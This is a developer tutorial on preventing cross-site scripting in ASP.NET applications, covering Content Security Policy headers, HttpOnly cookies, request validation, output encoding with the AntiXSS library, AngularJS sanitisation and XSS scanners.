Preventing XSS in ASP.Net Made Easy

“Our web applications can trust the motives of its users and the information they provide”
                                                                                                               - No One Ever

Is your web application serving up static data, pages that never change and don't accept any user input implicitly or explicitly?

If yes, we're done here. This article isn't for you.

But, what are the chances of that? Probably zero. This is Web x.0 and most likely you're serving up dynamic pages, pages that your visitors most likely interact with. Whether they are searching for something on your site, logging in, leaving comments, navigating to a specific URL that includes parameters or any number of common activities a user on your site might do. If that sounds more like activities on your web application that users might participate in, then read on.

In 2014, Cross-Site Scripting (XSS) has been identified as the most frequently found vulnerability amongst vulnerabilities tested for in web applications. More concerning is that OWASP has identified it as #3 in their top 10 web application security flaws ranked by prevalence and business impact. Like trash attracts flies, the ever-evolving user immersion of today's web applications is a playground for vulnerabilities such as XSS. But why is that and what can we do about preventing XSS in ASP.NET web applications?

Preventing XSS in ASP.NET Made Easy

If you have spent anytime attempting to wrap your head around XSS, like many, you might have come to the same conclusion of feeling overwhelmed and perplexed. We have made it that way by defining 5 terms for small variations of ways the vulnerability can be exploited and a plethora of information and ways to implement mitigations. Whereas in reality, it can be much simpler and straight forward.

The key to understanding XSS lies in the understanding there are only 2 key players involved. Having a basic understanding of about those 2 players and their role will empower you with the ability to identity XSS vulnerabilities in your web application. Furthermore, coupling that information with the tools I provide will help in taking a pro-active approach to protecting against this type of vulnerability.

Those key players are the browser and external sources. Let's start off by understanding the browser's role.

Execute All the Things!

For you seasoned web developers, the following will be a trivial example. But for the newly indoctrinated or those making a foray into web development, the following is a very high level example of the flow for a client requesting a site such as http://example.com.

Things

I highly recommend reading How Browsers Work for a very technical outline of, you guessed it, how browsers work.

We can take a simple approach and divide all the information the browser receives from the web server into two camps, data and instructions. Therefore, when the browser is executing a JavaScript script for example, we can say it is processing that information within an instruction context. Contrarily, when the browser is displaying plain text, this can be viewed as a data context. However, when our web application receives information that we expect to simply be data and instead contains instructions that is masquerading as data, the browser will execute those instructions. Since, generally speaking browsers do not have any concept of malicious vs. non-malicious.

The key here is “information our browser receives”. Where does that information come from, only the developer? Or, does it contain information provided by an external source? This leads us to the second key player in understanding XSS.

Note: I said earlier that browsers don't have a concept of malicious vs. non-malicious. However, modern browsers are getting better at providing native mitigations and implement a number of constraints and rules that help mitigate a number of vulnerabilities, some of which are categorized as XSS. Unfortunately, these constraints and rules vary from browser to browser and relying on the protection of one browser might leave you vulnerable in another. They should always be viewed as icing on the cake.

External Source

Whereas the browsers execution of instructions might be the catalyst, the cause for a XSS exploit comes from external sources.

One of the many ingredients that go into a web application providing a rich and immersive user experience is user input. Nearly all cases of XSS vulnerabilities originate from user input and some would go as far as saying all cases. As said at the beginning of this article, user input can originate from a number of sources such as form inputs, blog post comments and query string parameter values of a direct URL for just a few examples. In each of these examples, the user, an external source, is providing information to our web application, that we have the potential to do something with.

Therefore, when it comes to understanding the role of external sources in XSS, we can easily identify any potentially vulnerability within our site where we are allowing user input that has not been properly handled. Before getting to the "properly handling", let's look at an easy example to drive the preceding home.

The Case of the Curious Comment

The following example should outline how a malicious script can be injected onto a page that a separate victim, on a separate computer, at a separate location can be directly affected by and what kind of malicious act the script might perform.

Your company's strict licensing and security policy doesn't allow the use of third-party tools. So the new article comments feature they want to make available on the company's website must be developed in-house from the ground up. With the new comment feature available for users the following scenario is carried out.

Curious Comment

In the example, a malicious user ends up being allowed to embed a <script> HTML tag into their comment that is ultimately saved to storage by the server. When anyone visits the page that contains the comment, the server will serve all HTML, CSS, JavaScript and other resources pertaining to the page, to the victim's browsers. In turn, the victim's browser will render all HTML and execute any scripts. Scripts such as the one found embedded in the comment that the victim's browser received from our server.

We can see here that an attack's user input was able to be injected, persisted, delivered and executed on another user's computer. The outcome can be any number of results such as the proposed diagram of stealing the user's cookies that could allow the attacker to impersonate the victim.

Recap

Based on everything so far, you can summarize that a XSS vulnerability can exist anywhere within our web application, that an external source such as user input is allowed to supply information to our application and that information has the potential to carry instructions such as JavaScript, that could potentially be harmful.

So would not allowing user input be the correct answer to remove this vulnerability? Obviously not, the answer is properly handling user input. Treating any externally supplied information as potentially harmful and neutering it.

Fix All the Things!

Again, if you have spent any time reading the numerous resources regarding XSS, you no doubt have come across the abundant number of variations of how this vulnerability can be exploited. However, in all cases, as long as all the user input is properly handled and utilizing additional proactive testing methods, you will greatly reduce your chance of being exploited by this type of vulnerability.

Unfortunately, along with the enormity of possible XSS vulnerabilities comes the vast amount of information on how you should secure your web application from being exploited. Therefore, instead of subjecting you to the fire-hose effect, I have formed a template constructed of 3 building blocks that will help you focus your efforts for applying mitigations to your web application. Furthermore, within those templates, you can easily swap-out or add additional mitigation depending on your applications needs or specific edge cases.

Fix All the Things

There is very much information in the following sections, but unlike other sources of information on how to handle XSS vulnerabilities, the following information should be able to be consumed by focus area and even more granular, per recommended mitigation.

In addition, whitelisting and blacklisting are two popular approaches to take when specifying security rules (in different contexts) that we want our application to adhere to. In nearly all cases a whitelist approach is the recommended and most maintainable choice. This is the approach you will see used through the various recommended mitigations either as my recommendation, or a mitigation's internal approach.

Application

application

At the application layer we are looking at deploying mitigations that can have a positive application-wide security impact. These are usually defense in-depth mitigations that can touch both the client as well as the server.

HTTP Response Headers

There are a number of HTTP headers that we can pass back on all responses to limit assumptions made by the browser, control browser loading behavior and mitigate user specific security changes. Lucky for us, all the headers we will leverage are fully supported by modern browsers. Let's start off by looking at the header that will have the biggest impact for mitigating XSS vulnerabilities; the Content Security Policy.

Content Security Policy (CSP)

The content-security-policy header allows applications to dictate to the browse what sources the browser is permitted to acquire resources from. There is an extensive list of various web application resources that can be controlled such as scripts, styles, images, audio and video, form actions and embedded resources just to name a few.

If we have made anything clear, it is the ability for XSS vulnerabilities to allow attackers to potentially load and execute scripts from other sources such as an embedded script on a crafted URL in an email. The ability to remove that threat by specifying the allowed sources that the browser can load resources from significantly narrows the attacker's abilities within our web application.

So in an example where we want to restrict the loading of script and style resources to only our domain would be as easy as specifying the script-src and style-src directive and setting the value to "self".

Content-Security-Policy: script-src 'self'; style-src 'self'

But in a common scenario where we want to load resources from external sources such as CDNs, we only need to add those domains to the whitelist. We can see this in the following example where we might want to load the Bootstrap script and style resources from Google's CDN (https://ajax.googleapis.com) and limiting image sources to our domain only with the img-src. We are also utilizing the default-src directive to specify that all resources must be loaded over HTTPS:

Content-Security-Policy: default-src https:; script-src 'self' https://ajax.googleapis.com; style-src 'self' https://ajax.googleapis.com; img-src 'self'

Therefore, in the case where a victim has received a well-crafted link from an attacker that would attempt to load an external script, would be denied since it was not included in the whitelist. It might go without saying, but if a trusted source (for example Google's CDN) was compromised, we in turn would be vulnerable since we trust that source.

Implementing in ASP.NET

In the context of the ASP.NET MVC framework, we could accomplish adding this content-security-policy header to our responses in a number of ways.

Using an Attribute

  1. public class ContentSecurityPolicyFilterAttribute : ActionFilterAttribute  
  2. {  
  3.    public override void OnActionExecuting( ActionExecutingContext filterContext)  
  4.    {  
  5.       var response = filterContext.HttpContext.Response;  
  6.       response.AddHeader("Content-Security-Policy" ,  
  7.       "default-src https:;  
  8.       script-src 'self' https://code.jquery.com https://ajax.aspnetcdn.com;  
  9.       style-src 'self' https://ajax.aspnetcdn.com");  
  10.   
  11.       base.OnActionExecuting(filterContext);  
  12.    }  

Then we can either enforce this globally by loading it into the ASP.NET pipeline by registering it as a global filter or individually on actions or controllers. Obviously, this is a very straightforward example. But, it would not be difficult to enforce default behaviors (default-src) on all HTTP response headers and layer on granular control at the controller or action level. Or, alternatively, here is an example of how you could utilize the OWIN modular approach to insert on the pipeline.

Web.config / IIS

If using IIS 7 or above, we have the alternative to load it using the web.config by specifying custom headers to be included.

  1. <configuration>  
  2.    <system.webServer>  
  3.       <httpProtocol>  
  4.          <customHeaders>  
  5.             <add name="Content-Security-Policy" value="'self' https://ajax.googleapis.com" />  
  6.          </customHeaders>  
  7.       </httpProtocol>  
  8.    </system.webServer>  
  9. </configuration> 

Alternatively to the web.config approach, utilizing IIS Manager, you can apply custom headers using IIS directly.

There is an abundance of flexibility and control options afforded by the content-security-policy header that can provide security and control for other areas that we have not covered here. To get the full details and breakdown of all of the content-security-policies see the W3C documentation.

NOTE: Be aware that besides the value of "self", other directive values of "unsafe-inline" and "unsafe-eval" are directive values that you should absolutely avoid if at all possible. Specifying it as a white-listed value would remove the security benefit afforded by the CSP.

Reflected-xss

Reflected-xss is actually just another directive that is part of the content-security-policy like the script-src and style-src directives we saw above. The difference is that it replaces an older/unstandardized header of X-XSS-Protection that a number of browsers didn't support. I included it as its own separate mitigation since it is quite different in its intended goal.

Sometimes browsers offer heuristic filters to help filter out "potentially" unsafe scripts that were reflected back to the client because they (user supplied data that contains harmful script as data) came in on the request and are now being reflected back on the response. When the browser filter is turned off by the user, the ability to still enforce this filter can be accomplished by utilizing the reflective-xss directive.

If you set this directive value to "block" you will completely pull the plug on loading any resources on the page when the browser concludes that it has potentially discovered unsafe data in the response. Alternatively, you can filter out the potentially harmful script and allow the site to continue loading trusted resources, by using the "filter" value.

Content-Security-Policy: reflected-xss 'filter'

As far as ASP.NET implementation, this directive is added using the same preceding methods as described under Content Security Policy.

NOTE: This policy (and more so the original unstandardized X-XSS-Protection header) has received some legitimate negative feedback due its ability to interfere with requests/responses that contained cases where legitimate <script></script> was part of the request (such as in the case of wanting to allow it as part of a search). Ensuring HTML encoding can neuter a vulnerability without interference by the filter. So know the limitations of this directive and when affecting the user experience, opt for other mitigations such as escaping (output encoding) that we'll be looking at shortly.

Cookies

A typical target goal by a XSS exploit is to acquire a user's cookies for a number of reasons that I have gone into extensively in this article/video.

HTTPOnly Flag

We have a few levels at which we can apply this mitigation. At a minimum we can remove the ability to reach the cookie using the browser by utilizing the HTTPOnly flag on the Set-cookie header. So wherever we are setting and passing our applications cookies we can set the HTTPOnly flag to true to accomplish this.

In ASP.NET, it can be as simple as setting the HTTPOnly property to true within a CookieHeaderValue object that is then added to the cookies collection on the response header:

  1. var cookie = new CookieHeaderValue ("myapp", nvc)  
  2. {  
  3.    //domain  
  4.    //path  
  5.    HttpOnly = true  
  6. };  
  7.   
  8. var response = new HttpResponseMessage(HttpStatusCode.Ok);  
  9. response.Headers.AddCookies(new []{ cookie}); 

As you can see there are quite a few application wide mitigations we can apply that cross a number of application borders. Let's now focus our attention to mitigations that apply specifically to the server.

Server

server

At the server layer, we are targeting the ASP.NET framework for specific mitigations that will generally incorporate a majority of steps we take to remove XSS vulnerabilities.

Request Validation

ASP.NET provides an out-of-the box feature that automatically validates all incoming HTTP requests called Request Validation. With all the various ASP.NET frameworks and versions available, OWASP provides a quick glance chart at the specific frameworks and their support of Request Validation.

Request validation attempts to detect any markup or code in a request and throws a "potentially dangerous value was detected” error message, returning a 500 HTTP status code.

error message

Important! This is a mitigation that should be viewed as a defense-in-depth approach and absolutely not relied on by itself as a be-all end-all solution.

There doesn't need to be anything done to enable it as it is active by default. There are cases when you might need to allow valid markup without it being blocked. This can be accomplished by utilizing the ValidateInput attribute on an ASP.NET controller or action and passing it the value “false”:

  1. [ValidateInput(false)]  
  2. public ActionResult UploadMarkup(string someStr)  
  3. {  
  4.    //...  
  5.   

However, Request Validation can be completely disabled by following the instructions provided on this MSDN article.

Manual Validation

We just looked at an out-of-the-box feature that ASP.NET provides for validating user input that can be an extremely helpful mitigation in a defense in-depth strategy. However, since we are in control of how our application handles user input, limiting the scope of what type of data can be submitted to our APIs can be another check-point for providing input validation by filtering out invalid data.

ASP.NET provides a number of flexible ways to manually validate input that reaches our APIs. However, I wanted to focus on a couple simple-to-implement options for providing instant input validation. We can easily add data validation rules to models in ASP.NET MVC and Web API alike using the Data Annotation library. This allows us to be expressive in what our expectations are for the user input. For the most part, most data annotations will apply a whitelisting approach naturally.

The tricky part is validating strings for example. But Data Annotations allow for putting restrictions in place such as a Social Security Number string using the RegularExpressionAttribute.

  1. public class PersonModel  
  2. {  
  3.    //...FirstName  
  4.    //...LastName  
  5.   
  6.    [RegularExpression(@"^\d{9}|\d{3}-\d{2}-\d{4}$", ErrorMessage = "Please enter a valid Social Security Number")]  
  7.    public string Ssn { getset; }  

When we need to control the logic that goes into validating user input, we can leverage the ValidatorAttribute class. This class allows us to create our own annotations when the need arises and there are a number of great articles to get you started. However, it is easy to inadvertently fall into using a blacklisting approach when using the built-in regular expression data annotation or by creating our own custom data annotation. So be careful of how your logic or expression is being applied.

Content-Type and Character Set

To help the browser determine what type of information it received, we can provide it metadata about the information (data) in the form of a specified MIME type label that is specified on the content-type header. Therefore, when the browser receives JavaScript scripts files (text/javascript), HTML (text/html) or a PNG image (image/png), it will know how to process it.

This article is not about MIME types, however if the correct content-type is not specified, browsers will undergo what is called content or character set sniffing to determine what the content-type is for a resource. When the browser doesn't have a correct content-type or character set (that specifies the encoding), it leaves the door open for the browser to receive external input that tricks the browser to interpret part of the response as HTML that in turn can lead to a XSS exploit.

Depending on the framework in use, there are a number of ways that you can specify the content-type and character set. Obviously this can be important with ASP.NET MVC or Web API, for returning various payloads. Therefore, if needed, setting the content type might be done at the individual controller action of Web API by setting the Content property on a response:

  1. [HttpGet]  
  2. public HttpResponseMessage GetCsv(string fileName)  
  3. {  
  4.    var csv = LoadCsv();  
  5.    var response = Request.CreateResponse(HttpStatusCode.OK);  
  6.    response.Content = new StringContent(csv.ToString(), Encoding.UTF8, "text/csv");  
  7.    return response;  

Alternatively, this can be accomplished as well using the pipeline in an OWIN module such as how the Nuget package Nancy does.

Data Encoding/Escaping

We have officially reached the mother lode of mitigations to apply to XSS vulnerabilities. This is also where you might also find yourself highly confused if you have done any research before now, with the back and forth and interchangeable terms “encoding” and “escaping” being applied to both HTML and JavaScript. So, let's take a quick moment and define what they actually mean.

It starts by going back to our original key player “the browser”. When our web application receives information from an external source that we expect to simply be data and instead contains instructions that are masquerading as data, the browser will execute those instructions. So if the heart of the vulnerability lies in the data being subterfuged, then having the ability to notify the browser that this data should only be treated as data and nothing else, will ensure that instructions can't be executed. This is “escaping” (a. k. a. output encoding) in a nutshell.

Jeff Williams's description of “escaping” (output encoding) on OWASP is one of the best I have seen and its role:

“’Escaping’ is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser. There are lots of different types of escaping, sometimes confusingly called output ‘encoding’. Some of these techniques define a special ‘escape’ character and other techniques have a more sophisticated syntax that involves several characters.

Do not confuse output escaping with the notion of Unicode encoding. Which involves mapping a Unicode character to a sequence of bits. This level of encoding is automatically decoded and does not defuse attacks. However, if there are misunderstandings about the intent charset between the server and browser, it may cause unintended characters to be communicated, possibly enabling XSS attacks. This is why it is still important to specify the Unicode character encoding (charset), such as UTF-8, for all communications.

Escaping is the primary means to make sure that untrusted data can't be used to convey an injection attack. There is no harm in escaping data properly – it will still render in the browser properly. Escaping simply lets the interpreter know that the data is not intended to be executed and therefore prevents attacks from working.


Implementation

So now that we understand that output encoding is the answer to let the browser know that we want the information it is receiving to be rendered as data and not instructions, how do we implement it? Well first off, if you do any researching, you will find a vast amount of rules regarding:

  1. Are we working in an HTML context?

  2. What if this is a JavaScript context where we need to encode some data?

  3. Or maybe this is a blended context where we have HTML within JavaScript?

There are so many rules and variations that must be taken into consideration when doing proper encoding that you are highly prone to make a mistake if you attempt to do it manually and that is never recommended. Therefore, to ensure that rendering any output that originated from an external source such as user input, relying on an output encoding library specifically designed for tackling this problem is the answer.

ASP.NET and the AntiXSS Library

ASP.NET makes it very easy to encode output and ensure the browser renders it without the jeopardy of any malicious script being executed, but that was not always the case. To have a better appreciation of what we have with @Razor templates, let's see where we have been.

Early versions of ASP.NET did not encode:

  1. <div><%= model.Address %></div> 

Then they implemented a helper that provided the ability to encode output:

  1. <div><%= Html.Encode(model.Address) %></div> 

Then, they incorporated encoding implicitly using the new syntax that also ensured that you didn't inadvertently double encode:

  1. <div><%: model.Address %></div> 

Finally, with @Razor, it allowed you to do it all in one step that provides output encoding.

  1. <div>@Model.Address</div> 

However

There is one inherent problem with ASP.NET's native encoding routines; they generally use a blacklisting approach to their validation. Moreover, there are cases outside the preceding simple encoding scenarios such as providing user input in an HTML attribute. Or possibly there is a mixed context scenario that involves HTML being used in a JavaScript context. In each of these and other similar scenarios, an HTML attribute context is different than working in a JavaScript or CSS context. Therefore, requiring a different approach that I have said before.

To the rescue is the .NET AntiXSS library. This library uses a whitelisting approach that has begun to be included in even some of the encoding routines of ASP.NET as seen in the new System.Web.Security.AntiXss namespace. The library provides a number of helper functions for both output encoding as well as sanitation (that we haven't even talked about), that cover HTML, JavaScript, XML, CSS and HTML Attributes.

There are the following 3 steps to get up and running with AntiXSS library in your ASP.NET application.

    Step 1: Include in your project

    An easy and quick way to pull the AntiXSS library in using the Nuget package, or download and include the assemblies directly.

    assemblies directly

    Step 2: Set AntiXSS library as your default encoding library using the web.config:

    We can take it one step further and incorportate AntiXSS as our default encoding library by updating the encoderType attribute of the httpRunTime element of the web.config.

  1. <httpRuntime targetFramework="4.5.1" requestValidationMode="2.0" encoderType="System.Web.Security.AntiXss.AntiXssEncoder" /> 

    Step 3: (Optional) Utilize the Encoder and Sanitizer

    Outside of utilizing the library as the primary encoding provider, it's not uncommon to need to put user data into contexts that require different encoding syntax based on the context. The library provides helper methods for handling cases where we need to inject encoded user input into HTML Attributes, CSS, JavaScript and URLs. In other scenarios we might want to allow user input in the form of HTML, we can utilize the sanitation functions the library affords to remove any elements of supplied user input that is not part of the whitelist of safe characters.

  1. <div data-personal="@Encoder.HtmlAttributeEncode(Model.LastName)"></div>  
  2.   
  3. <div>@Sanitizer.GetSafeHtmlFragment(Model.PersonalWebsiteUrl)</div> 

See the OWASP link for a consolidated list of resources for utilizing the AntiXSS library's helpers, or you can simply utilize the library's open-source repository. Visual Studio's intellisense helps too!

Before proceeding, this might be a good time to pause to talk a little more about the concept of sanitizing user input and what this means.

Sanitation

We've said sanitize or the sanitation of user input on a few occasions. Sanitation affords us the ability to retain user input that has been found safe, while removing unsafe characters and values. The risk of performing sanitation on user input comes down to how it is being done.

Attempting to manually sanitize data against a home-grown blacklist can be a disaster waiting to happen. This is simply because an attacker's creative ways to sneak data past your sanitation checkpoints is forever changing. Therefore, this is another chance to drive home the importance to leverage a library that's main purpose is to facilitate proper sanitation. We'll talk more about sanitation when we look at AngularJS's implicit use of sanitation under the Client.

I Am Persisting This User Input, When Should I Encode It?

A common question I hear asked is “I am persisting this user input, when should I encode it?” Fair enough question, seems logical that a conclusion to do it before saving it would be expected. However, the general consensus is that it should not be done before persisting it to storage but do it when it is ready for display in an output context.

The following is what is recommended so that we can completely eliminate the following scenarios:

  1. Double encoding.

  2. Assumptions that it was already handled properly.

  3. Possible data loss through truncation because encoded data is larger than original user input.

  4. Application requirements change. The need to consume the data differently (in a non-encoded state) is a real possibility.

  5. Less prone to errors – see #2.

If there is any take-away from the server-side mitigations, it's to understand the importance of escaping (output encoding) user input, but leveraging the proper library to ensure it is facilitated correctly based on context. However, these mitigations outlined here will help fortify the server side of the web stack. Let's now turn our attention to what we can do on the front-end client.

Client

client

With the ever-growing popularity with JavaScript frameworks (specifically SPAs), the need to be cognitive of the techniques (if any) to properly handle output is paramount. Here we'll look at some cases where the client can be isolated to specific vulnerabilities that you need to be aware of, as well as the security measures used by the popular AngularJS framework.

We have covered much and probably would cover a vast majority of all XSS vulnerabilities. But, for some time now, the workload for web applications has taken a major shift to the front-end of the web stack. Because of this, the possibilities of the front-end circumventing measures you have on the back-end are even more prevalent. With this shift we have seen the increasing use of a front-end. If you haven't taken the time to examine what security measures your front-end framework of choice offers, now would be the time.

Every framework is different as well as the amount of importance they put on security. To provide an example of what I mean about be cognitive of your front-end frameworks security measures, let's look at one of the current popular JavaScript frameworks.

AngularJS a popular JavaScript framework that does much out-of-the-box to provide mitigations against XSS attacks. Without any additional work on your part it will output encode HTML that it attempts to bind to the DOM (for example ngBind, ngRepeat and so on.).

  1. <li ng-bind="todo"></li> 

However, if you have HTML you want to have rendered as HTML and not just encoded output, they make it possible using the ngBindHtml directive:

  1. <li ng-bind-html="todo"></li> 

However, doing this will render you an error regarding your attempt to render “potentially” unsafe HTML:

Error:
[$sce:unsafe] Attempting to use an unsafe value in a safe context.

As an additional security measure, AngularJS requires that at a minimum you provide it a sanitizer that is done by providing it the ngSanitizer service as an application dependency.

angular.module('questionnaire', ['ngRoute', 'ngSanitize'])

Then, using a whitelist approach, Angular will sanitize (remove) any potentially harmful data before rendering the HTML.

However, when you want to render user input as HTML, Angular provides a Strict Conceptual Escaping service that allows you to do just that. Using a number of helper methods that make rendering user input as HTML in different HTML, CSS, JavaScript and URL contexts.

Finally, one last tool provided by Angular is its ngCSP directive that ties into the Content Security Policy we talked about earlier. It forces Angular to take a more stringent approach to JavaScript evaluation and will no longer take eval based shortcuts but also reduce performance by 30%.

This isn't an article on Angular security and I will leave it to other articles to take you through the implementation process of the preceding Angular security features. However, as we have seen, the ever-increasing shift of responsibility to the front-end has made way for more and more front-end frameworks to spring up. Therefore, it is paramount to be cognitive of what security features your framework of choice has or lacks.

Tools

WhiteHat Security founder Jeremiah Grossman coined the term “hack yourself first” talking about going on the cyber offense. The idea is to rattle your own web application's cage to see exactly how weak it is. Because, truth be told, we can do all this, but will you have caught all the XSS vulnerabilities within your web application? How would you know? Magically, you cannot.

That is why it is highly recommended to employ tools such as an XSS Scanner. However, this is not an article on how to use an XSS Scanner or to promote one over another. Tools are changing, losing support and new ones are coming out quite regularly. Google has launched their free and open-source XSS scanner Firing Range that might be worth checking out. But, it is highly important that you take proactive steps to ensure you have found and mitigated any XSS vulnerabilities within your application.

The Take-Away

When it comes to understanding XSS vulnerabilities, exploits and mitigations there is much to consider and cover. However, we can make this easier on ourselves if we adhere to the following 6 take-away points:

  1. Understanding how the browser's role as well as the role of external sources work in tangent and are the key players involved when it comes to understanding XSS.

  2. External sources, and more precisely any form of user input, must be untrusted, assumed malicious and handled properly.

  3. When applying mitigation techniques, leverage a whitelisting approach is the most safest and easiest to maintain. When choosing tools (for example AntiXSS library), try to pick ones that also leverage the whitelisting approach.

  4. Use the application, Server and client focus area's to help make mitigations more digestible and more consistent in coverage.

  5. Understand the various contexts where data can be encoded such as JavaScript, CSS, HTML and URL and utilize a XSS library for applying the appropriate encoding.

  6. Finally, understand the importance of hacking yourself first and utilizing tools such as XSS scanners to check your work.

There is a reason why XSS is one of the most prevalent and costly web application vulnerabilities in the wild. It is easy to discover, easy to exploit and as software developers, easy to introduce. Therefore, if we can be cognitive that anywhere in our web application that user input is being accepted, it must be handled properly.

Up Next
    Ebook Download
    View all
    Learn
    View all